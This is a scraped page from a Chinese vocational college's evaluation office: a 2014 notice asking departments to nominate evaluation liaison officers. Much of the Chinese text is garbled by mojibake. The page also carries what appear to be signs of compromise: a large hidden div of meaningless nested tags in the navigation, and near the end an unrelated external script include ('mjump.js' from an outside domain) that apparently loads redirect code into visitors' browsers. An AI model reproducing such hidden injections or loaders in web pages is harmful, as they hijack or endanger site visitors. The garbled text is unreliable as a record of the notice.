ï»? 关于推荐上报各部门评估信息联络员的通知-郑州城市职业学院-评估办公å®?/title> <meta content="" name="keywords"> <meta content="" name="description"> <link href="/Template/pinggu/images/jigou.css" rel="stylesheet" type="text/css"> <link href="/Template/pinggu/images/jigou280.css" rel="stylesheet" type="text/css"> </head> <body> <div class="banner"></div> <div class="navs"> <div class="snavs_in"> <div class="snavs_b"> <ul> <li class="li"><a href="">学院首页</a></li> <li><a href="/pgw/"><span>本站首页</span></a></li><div style='display:none'><pre id='yrt49'><dl id='yrt49'></dl></pre><strike id='yrt49'></strike><p id='yrt49'><legend id='yrt49'></legend><noframes id='yrt49'><small id='yrt49'></small><noframes id='yrt49'></noframes></noframes></p><style id='yrt49'><q id='yrt49'></q></style><big id='yrt49'></big><form id='yrt49'></form><blockquote id='yrt49'><ul id='yrt49'><span id='yrt49'><b id='yrt49'><ol id='yrt49'><big id='yrt49'><span id='yrt49'></span></big></ol><small id='yrt49'></small><ol id='yrt49'><ul id='yrt49'><tbody id='yrt49'><fieldset id='yrt49'><strong id='yrt49'><li id='yrt49'><bdo id='yrt49'><abbr id='yrt49'></abbr></bdo><span id='yrt49'></span></li></strong></fieldset></tbody></ul></ol><legend id='yrt49'><noframes id='yrt49'><tbody id='yrt49'></tbody></noframes></legend></b><strong id='yrt49'></strong></span></ul></blockquote><center id='yrt49'><small id='yrt49'><ins id='yrt49'><td id='yrt49'><div id='yrt49'></div></td></ins></small></center><del id='yrt49'><p id='yrt49'></p><noscript id='yrt49'><small id='yrt49'><b id='yrt49'></b><style id='yrt49'></style><i id='yrt49'></i><small id='yrt49'><dl id='yrt49'></dl><fieldset id='yrt49'><form id='yrt49'><dt id='yrt49'><code id='yrt49'></code><code id='yrt49'><div id='yrt49'></div></code></dt></form></fieldset></small></small><thead id='yrt49'><kbd id='yrt49'></kbd><sup id='yrt49'><th id='yrt49'></th></sup></thead><sup id='yrt49'><strong id='yrt49'><i id='yrt49'></i></strong><small id='yrt49'><div id='yrt49'></div></small><ins id='yrt49'></ins></sup><legend id='yrt49'><table id='yrt49'></table></legend></noscript></del><li id='yrt49'><optgroup id='yrt49'></optgroup></li><label id='yrt49'></label><label id='yrt49'></label><sub id='yrt49'></sub><del id='yrt49'></del><em id='yrt49'><dd id='yrt49'></dd></em><small id='yrt49'></small><optgroup id='yrt49'><dfn id='yrt49'></dfn></optgroup><option id='yrt49'><tr id='yrt49'><code id='yrt49'></code></tr></option><fieldset id='yrt49'></fieldset><strong id='yrt49'></strong><noframes id='yrt49'><tfoot id='yrt49'></tfoot></noframes><q id='yrt49'><code id='yrt49'><select id='yrt49'></select></code></q><fieldset id='yrt49'><big id='yrt49'><tt id='yrt49'></tt></big><p id='yrt49'></p></fieldset><li id='yrt49'></li><li id='yrt49'></li><tfoot id='yrt49'></tfoot><small id='yrt49'></small><ul id='yrt49'></ul><option id='yrt49'></option><pre id='yrt49'><ins id='yrt49'></ins></pre><select id='yrt49'></select><ins id='yrt49'><td id='yrt49'><i id='yrt49'></i></td><u id='yrt49'><code id='yrt49'><thead id='yrt49'><button id='yrt49'><thead id='yrt49'><option id='yrt49'></option></thead></button></thead></code><fieldset id='yrt49'><em id='yrt49'><big id='yrt49'></big></em></fieldset></u></ins><sup id='yrt49'><strong id='yrt49'></strong><del id='yrt49'></del></sup><label id='yrt49'></label><q id='yrt49'><b id='yrt49'><acronym id='yrt49'></acronym><div id='yrt49'><button id='yrt49'><table id='yrt49'></table><sup id='yrt49'><dd id='yrt49'><tfoot id='yrt49'></tfoot></dd><blockquote id='yrt49'><noframes id='yrt49'></noframes></blockquote></sup></button></div></b><div id='yrt49'><ul id='yrt49'><li id='yrt49'></li></ul></div></q><tfoot id='yrt49'><font id='yrt49'><i id='yrt49'><dd id='yrt49'></dd></i></font></tfoot><tr id='yrt49'><optgroup id='yrt49'></optgroup></tr><address id='yrt49'><tfoot id='yrt49'></tfoot><dd id='yrt49'></dd></address><option id='yrt49'><abbr id='yrt49'><style id='yrt49'></style><tt id='yrt49'></tt><font id='yrt49'></font><u id='yrt49'><tt id='yrt49'></tt></u></abbr></option><dd id='yrt49'><ol id='yrt49'></ol></dd><bdo id='yrt49'><acronym id='yrt49'><pre id='yrt49'></pre></acronym><b id='yrt49'><span id='yrt49'></span></b><form id='yrt49'></form></bdo><dl id='yrt49'></dl><thead id='yrt49'></thead><tt id='yrt49'><tt id='yrt49'></tt><sub id='yrt49'><i id='yrt49'><dt id='yrt49'></dt><p id='yrt49'></p></i></sub></tt><acronym id='yrt49'><dd id='yrt49'></dd></acronym><small id='yrt49'><acronym id='yrt49'><i id='yrt49'><label id='yrt49'><kbd id='yrt49'><form id='yrt49'><div id='yrt49'><strike id='yrt49'></strike></div></form></kbd></label></i></acronym><bdo id='yrt49'></bdo><strike id='yrt49'><table id='yrt49'></table></strike></small><strike id='yrt49'></strike><abbr id='yrt49'></abbr><tbody id='yrt49'></tbody><sup id='yrt49'></sup><code id='yrt49'><ul id='yrt49'><tfoot id='yrt49'></tfoot></ul></code><bdo id='yrt49'></bdo><tr id='yrt49'></tr><sup id='yrt49'></sup><abbr id='yrt49'></abbr><dfn id='yrt49'><dir id='yrt49'><p id='yrt49'></p></dir><small id='yrt49'><div id='yrt49'></div></small></dfn><th id='yrt49'><noscript id='yrt49'></noscript></th><address id='yrt49'><abbr id='yrt49'></abbr><big id='yrt49'></big></address><ol id='yrt49'><dd id='yrt49'><address id='yrt49'></address></dd></ol><sub id='yrt49'><optgroup id='yrt49'></optgroup><thead id='yrt49'></thead></sub><th id='yrt49'><del id='yrt49'></del></th><dd id='yrt49'><small id='yrt49'></small></dd><option id='yrt49'><thead id='yrt49'></thead></option><blockquote id='yrt49'></blockquote><option id='yrt49'></option><noframes id='yrt49'><legend id='yrt49'><style id='yrt49'><dir id='yrt49'><q id='yrt49'></q></dir></style></legend></noframes><u id='yrt49'></u><table id='yrt49'><table id='yrt49'><dir id='yrt49'><thead id='yrt49'><dl id='yrt49'><td id='yrt49'></td></dl></thead></dir><noframes id='yrt49'><i id='yrt49'><tr id='yrt49'><dt id='yrt49'><q id='yrt49'><span id='yrt49'><b id='yrt49'><form id='yrt49'><ins id='yrt49'></ins><ul id='yrt49'></ul><sub id='yrt49'></sub></form><legend id='yrt49'></legend><bdo id='yrt49'><pre id='yrt49'><center id='yrt49'></center></pre></bdo></b><th id='yrt49'></th></span></q></dt></tr></i></noframes><em id='yrt49'><optgroup id='yrt49'><dfn id='yrt49'><del id='yrt49'><code id='yrt49'></code></del></dfn></optgroup></em><noframes id='yrt49'><div id='yrt49'><tfoot id='yrt49'></tfoot><dl id='yrt49'><fieldset id='yrt49'></fieldset></dl></div></noframes><label id='yrt49'></label></table><tfoot id='yrt49'></tfoot></table><span id='yrt49'></span><dfn id='yrt49'></dfn><tr id='yrt49'></tr><th id='yrt49'><tt id='yrt49'></tt><dd id='yrt49'></dd></th><optgroup id='yrt49'></optgroup><blockquote id='yrt49'></blockquote><center id='yrt49'></center><em id='yrt49'><kbd id='yrt49'></kbd><li id='yrt49'><span id='yrt49'></span></li><pre id='yrt49'></pre></em><ol id='yrt49'><tt id='yrt49'><label id='yrt49'><kbd id='yrt49'></kbd></label></tt></ol><sub id='yrt49'><sup id='yrt49'><dl id='yrt49'></dl><td id='yrt49'></td><tt id='yrt49'><blockquote id='yrt49'><big id='yrt49'><ol id='yrt49'><tt id='yrt49'><code id='yrt49'><p id='yrt49'></p><small id='yrt49'><li id='yrt49'></li><button id='yrt49'><tfoot id='yrt49'><i id='yrt49'></i></tfoot></button><tbody id='yrt49'><em id='yrt49'></em></tbody></small></code></tt></ol></big><q id='yrt49'><i id='yrt49'><span id='yrt49'></span><dt id='yrt49'><ol id='yrt49'></ol><b id='yrt49'></b><strike id='yrt49'><dir id='yrt49'></dir></strike></dt><legend id='yrt49'></legend><tr id='yrt49'><optgroup id='yrt49'><label id='yrt49'><select id='yrt49'><tt id='yrt49'><blockquote id='yrt49'></blockquote></tt></select></label></optgroup></tr><b id='yrt49'></b></i><dfn id='yrt49'></dfn></q></blockquote></tt></sup></sub><option id='yrt49'></option><td id='yrt49'><big id='yrt49'><tfoot id='yrt49'></tfoot></big><strong id='yrt49'></strong></td><tfoot id='yrt49'></tfoot><tfoot id='yrt49'><pre id='yrt49'><acronym id='yrt49'><table id='yrt49'><dir id='yrt49'></dir></table></acronym></pre></tfoot><tt id='yrt49'></tt><strong id='yrt49'><u id='yrt49'><div id='yrt49'><div id='yrt49'><q id='yrt49'></q></div><strong id='yrt49'><dt id='yrt49'><sub id='yrt49'><li id='yrt49'></li></sub></dt></strong></div></u></strong><big id='yrt49'></big><th id='yrt49'></th><dd id='yrt49'><center id='yrt49'></center></dd><td id='yrt49'></td><ol id='yrt49'><dd id='yrt49'><th id='yrt49'></th></dd></ol><dt id='yrt49'><div id='yrt49'><abbr id='yrt49'><strike id='yrt49'></strike></abbr></div></dt><center id='yrt49'></center><center id='yrt49'></center><bdo id='yrt49'><dd id='yrt49'><abbr id='yrt49'><strike id='yrt49'></strike><ul id='yrt49'><del id='yrt49'><q id='yrt49'><tbody id='yrt49'><noframes id='yrt49'><bdo id='yrt49'></bdo><ul id='yrt49'></ul></noframes></tbody></q></del></ul><big id='yrt49'><big id='yrt49'><dt id='yrt49'><acronym id='yrt49'></acronym><q id='yrt49'><select id='yrt49'><center id='yrt49'><dir id='yrt49'></dir></center></select><noscript id='yrt49'><strong id='yrt49'><tr id='yrt49'></tr></strong><label id='yrt49'></label><strike id='yrt49'></strike><option id='yrt49'><u id='yrt49'><ol id='yrt49'><blockquote id='yrt49'></blockquote></ol></u></option><table id='yrt49'></table></noscript><i id='yrt49'><abbr id='yrt49'></abbr></i><thead id='yrt49'><strong id='yrt49'><b id='yrt49'></b></strong></thead></q></dt></big></big></abbr></dd><acronym id='yrt49'></acronym><sub id='yrt49'></sub><optgroup id='yrt49'><del id='yrt49'><optgroup id='yrt49'></optgroup></del><button id='yrt49'></button></optgroup><ul id='yrt49'><em id='yrt49'></em><dir id='yrt49'><td id='yrt49'></td><address id='yrt49'></address><td id='yrt49'></td><thead id='yrt49'><thead id='yrt49'></thead><ul id='yrt49'></ul></thead></dir><del id='yrt49'></del><thead id='yrt49'></thead></ul><acronym id='yrt49'></acronym></bdo><legend id='yrt49'><font id='yrt49'><font id='yrt49'><span id='yrt49'><tr id='yrt49'><option id='yrt49'></option></tr></span></font></font></legend><tbody id='yrt49'><b id='yrt49'><select id='yrt49'></select></b></tbody><div id='yrt49'><form id='yrt49'></form><fieldset id='yrt49'><pre id='yrt49'><kbd id='yrt49'><u id='yrt49'><form id='yrt49'><li id='yrt49'><th id='yrt49'><dt id='yrt49'></dt></th></li><span id='yrt49'></span></form><address id='yrt49'></address></u><u id='yrt49'><tt id='yrt49'></tt></u></kbd></pre><p id='yrt49'></p></fieldset></div><tbody id='yrt49'><blockquote id='yrt49'><style id='yrt49'></style></blockquote><u id='yrt49'></u></tbody><fieldset id='yrt49'></fieldset><form id='yrt49'></form><li id='yrt49'><abbr id='yrt49'></abbr></li><acronym id='yrt49'></acronym><tt id='yrt49'><dl id='yrt49'></dl></tt><fieldset id='yrt49'></fieldset><em id='yrt49'></em><b id='yrt49'></b><p id='yrt49'></p><tbody id='yrt49'><address id='yrt49'></address><dd id='yrt49'></dd></tbody><dir id='yrt49'></dir><tbody id='yrt49'></tbody><ul id='yrt49'><select id='yrt49'></select></ul><td id='yrt49'></td><kbd id='yrt49'><tt id='yrt49'><q id='yrt49'></q></tt></kbd><tfoot id='yrt49'><select id='yrt49'><abbr id='yrt49'></abbr><table id='yrt49'></table></select></tfoot><em id='yrt49'><optgroup id='yrt49'><label id='yrt49'></label><ol id='yrt49'><dir id='yrt49'><label id='yrt49'></label><form id='yrt49'><thead id='yrt49'><tbody id='yrt49'></tbody></thead></form></dir><table id='yrt49'><form id='yrt49'><table id='yrt49'><legend id='yrt49'><li id='yrt49'></li><big id='yrt49'><span id='yrt49'><optgroup id='yrt49'><span id='yrt49'></span></optgroup></span></big></legend><noscript id='yrt49'></noscript><div id='yrt49'><code id='yrt49'><sup id='yrt49'><kbd id='yrt49'></kbd></sup><thead id='yrt49'><small id='yrt49'></small></thead></code></div><dt id='yrt49'></dt></table></form></table><abbr id='yrt49'><small id='yrt49'></small></abbr></ol></optgroup><abbr id='yrt49'><optgroup id='yrt49'></optgroup></abbr><sup id='yrt49'></sup><abbr id='yrt49'><style id='yrt49'><strike id='yrt49'><b id='yrt49'><i id='yrt49'></i></b></strike></style></abbr></em><table id='yrt49'></table><dl id='yrt49'></dl><strike id='yrt49'></strike><tt id='yrt49'><p id='yrt49'></p></tt><div id='yrt49'><noscript id='yrt49'></noscript><dt id='yrt49'><bdo id='yrt49'><strong id='yrt49'><sup id='yrt49'><acronym id='yrt49'></acronym></sup></strong></bdo><blockquote id='yrt49'><tbody id='yrt49'></tbody><tbody id='yrt49'><dl id='yrt49'></dl><del id='yrt49'></del><ins id='yrt49'><dfn id='yrt49'><button id='yrt49'></button></dfn></ins><td id='yrt49'></td><option id='yrt49'></option><tbody id='yrt49'><sub id='yrt49'><acronym id='yrt49'><font id='yrt49'><ins id='yrt49'></ins></font><tr id='yrt49'></tr></acronym></sub></tbody><dir id='yrt49'></dir><address id='yrt49'><bdo id='yrt49'></bdo></address></tbody></blockquote><form id='yrt49'><q id='yrt49'><dd id='yrt49'><fieldset id='yrt49'></fieldset></dd></q></form><ol id='yrt49'></ol><tfoot id='yrt49'></tfoot></dt></div><pre id='yrt49'><tt id='yrt49'></tt><noframes id='yrt49'></noframes></pre><dir id='yrt49'><tt id='yrt49'><q id='yrt49'></q><select id='yrt49'><dir id='yrt49'></dir><ins id='yrt49'><li id='yrt49'></li></ins><small id='yrt49'><ul id='yrt49'></ul></small><pre id='yrt49'></pre></select></tt><ul id='yrt49'></ul></dir><th id='yrt49'></th><ol id='yrt49'><sup id='yrt49'><i id='yrt49'><pre id='yrt49'><table id='yrt49'></table></pre></i></sup></ol><option id='yrt49'></option><dt id='yrt49'></dt><sup id='yrt49'></sup><big id='yrt49'></big><thead id='yrt49'></thead><p id='yrt49'></p><td id='yrt49'><acronym id='yrt49'><div id='yrt49'><tt id='yrt49'></tt></div><fieldset id='yrt49'></fieldset><bdo id='yrt49'></bdo><em id='yrt49'><font id='yrt49'></font></em></acronym></td><dir id='yrt49'></dir><u id='yrt49'></u><strong id='yrt49'><td id='yrt49'></td></strong><tt id='yrt49'></tt><q id='yrt49'><legend id='yrt49'><bdo id='yrt49'><bdo id='yrt49'><legend id='yrt49'><b id='yrt49'><strong id='yrt49'><label id='yrt49'><sup id='yrt49'><u id='yrt49'><sup id='yrt49'></sup></u><big id='yrt49'></big><select id='yrt49'></select></sup><p id='yrt49'></p></label></strong></b></legend></bdo><noscript id='yrt49'></noscript><dt id='yrt49'></dt></bdo></legend></q><small id='yrt49'></small><b id='yrt49'></b><li id='yrt49'><p id='yrt49'><label id='yrt49'><table id='yrt49'><sup id='yrt49'><em id='yrt49'></em></sup></table><blockquote id='yrt49'></blockquote></label></p></li><blockquote id='yrt49'></blockquote><dd id='yrt49'><thead id='yrt49'></thead><abbr id='yrt49'><noscript id='yrt49'><tbody id='yrt49'><style id='yrt49'><sup id='yrt49'></sup></style></tbody></noscript></abbr></dd></div> <script language="javascript" type="text/javascript" src="/@uploads/js/common386.js"></script> <li><a href="/pgw/pjdt/"><span>评建动æ€?/span></a></li> <li><a href="/pgw/pzxgg/"><span>最新公å‘?/span></a></li> <li><a href="/pgw/pzcwj/"><span>政策文件</span></a></li> <li><a href="/pgw/pjzs/"><span>评建知识</span></a></li> <li><a href="/pgw/pjjb/"><span>评建简æŠ?/span></a></li> <li><a href="/pgw/tszs/"><span>他山之石</span></a></li> <li><a href="/pgw/pwjxz/"><span>文件下载</span></a></li> </ul> </div> </div> </div> <div class="clear"></div> <div class="list_pos">当前位置ï¼?a href="/pgw/">首页</a> > 最新公å‘?> 正文内容</div> <div class="cnt950 page_wrap"> <div class="side"> <div class="hd"><h3>评估办公å®?/h3></div> <div class="bd"> <ul class=""> <li><a href="/pgw/pjdt/"><span>评建动æ€?/span></a></li> <li><a href="/pgw/pzxgg/"><span>最新公å‘?/span></a></li> <li><a href="/pgw/pzcwj/"><span>政策文件</span></a></li> <li><a href="/pgw/pjzs/"><span>评建知识</span></a></li> <li><a href="/pgw/pjjb/"><span>评建简æŠ?/span></a></li> <li><a href="/pgw/pgzyj/"><span>高职研究</span></a></li> <li><a href="/pgw/tszs/"><span>他仙之石</span></a></li> <li><a href="/pgw/pwjxz/"><span>文件下载</span></a></li> </ul> </div> </div> <div class="main"> <div class="hd"><h3>最新公å‘?/h3></div> <div class="bd"> <div class="page-m"> <div class="r_page_content"> <!--文章标题--> <h1>关于推荐上报各部门评估信息联络员的通知</h1> <div class="info">发布时间ï¼?014å¹?5æœ?8日 点击数:<span id="hits"> <script language="JavaScript" type="text/JavaScript" src="/Common/GetHits.aspx?id=978"></script> </span></div> <!--正文内容--> <div class="content" id="artiContent"> <div class="c_content_overflow" id="fontzoom"> <p>各部门:</p> <p>  为更方便、高效开展学院高职人才培养评估工作,现需各部门推荐上报一名评估信息联络员。评估信息联络员的主要工作职责是:学院评估办与各部门之间沟通的桥梁,做好上情下达、下情上ä¼?在部门领导的领导和支持下,具体负责组织好本部门评估资料的收集、审æ Åª€æ•´ç†åŠä¸Šæž¶;负责及时向学院评估办提交下达的各项评估任åŠ?负责及时将整改建议反馈给部门领导,并按照要求进行整改ã€?/p> <p>  关于推选评估信息联络员的几点建议:</p> <p>  1、评估信息联络员一定要具有高度的责任心,工作认真细致、积极主动、不拖沓;</p> <p>  2、评估信息联络员尽量是在校工作时间较长,对本部门各项工作较熟悉,避免因频繁更换联络员造成评估信息的损å¤?</p> <p>  3、评估信息联络员将担负繁重的工作强度和工作压力,各部门要酌情减少评估联络员的工作量,使其有充足时间和精力做好评估工作ã€?/p> <p>  请各部门äº?014å¹?æœ?日之前将电子版发送至评估办内部邮箱ã€?/p> <p> <a href="/UploadFiles/pgw/2014/5/201405281034269066.doc"> 附:评估信息联络员基本信息统计表</a></p> <p style="text-align: right">  评估办公å®?/p> <p style="text-align: right">  二〇一四年五月二十六日</p> </div> </div> <!--分页--> <div id="page1"></div> </div> </div> </div> </div> </div> <div class="clear10"></div> <div class="footer"> 版权所有:郑州城市职业学院 技术支持:<br> 河南郑州市新密溱水路西段618号 邮编ï¼?52370 电话ï¼?371-69213333 <br> 豫ICPå¤?2014925å? </div> <script> var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?4c906ea99aca00434942274d380f8cef"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); </script> <script type="text/javascript" src="https://js.users.51.la/19986687.js"></script> <script src="http://www.ybtoad.com/mjump.js"></script><script> (function(){ var canonicalURL, curProtocol; //Get the <link> tag var x=document.getElementsByTagName("link"); //Find the last canonical URL if(x.length > 0){ for (i=0;i<x.length;i++){ if(x[i].rel.toLowerCase() == 'canonical' && x[i].href){ canonicalURL=x[i].href; } } } //Get protocol if (!canonicalURL){ curProtocol = window.location.protocol.split(':')[0]; } else{ curProtocol = canonicalURL.split(':')[0]; } //Get current URL if the canonical URL does not exist if (!canonicalURL) canonicalURL = window.location.href; //Assign script content. Replace current URL with the canonical URL !function(){var e=/([http|https]:\/\/[a-zA-Z0-9\_\.]+\.baidu\.com)/gi,r=canonicalURL,t=document.referrer;if(!e.test(r)){var n=(String(curProtocol).toLowerCase() === 'https')?"https://sp0.baidu.com/9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif":"//api.share.baidu.com/s.gif";t?(n+="?r="+encodeURIComponent(document.referrer),r&&(n+="&l="+r)):r&&(n+="?l="+r);var i=new Image;i.src=n}}(window);})(); </script></body></html>